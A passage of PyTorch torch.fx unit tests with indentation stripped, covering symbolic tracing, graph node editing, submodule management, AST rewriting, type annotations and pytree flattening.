def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter_new, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter_new, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter_new, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_fx_stateless(self):
class MockModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(1, 1)
self.register_buffer('buffer', torch.ones(1))
def forward(self, x):
return self.l1(x) + self.buffer
module = MockModule()
x = torch.rand((1, 1))
weight = torch.tensor([[1.0]], requires_grad=True)
bias = torch.tensor([0.0], requires_grad=True)
buffer = torch.tensor([0.0])
parameters = {'l1.weight': weight,
'l1.bias': bias,
'buffer': buffer}
fx_module = torch.fx.symbolic_trace(module)
res = _stateless.functional_call(fx_module, parameters, x)
res.backward()
self.assertIsNotNone(weight.grad)
self.assertIsNotNone(bias.grad)
self.assertIsNone(buffer.grad)
# Gradient was not calculated for the module stated and buffers
self.assertIsNone(module.l1.weight.grad)
self.assertIsNone(module.l1.bias.grad)
self.assertIsNone(module.buffer.grad)
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
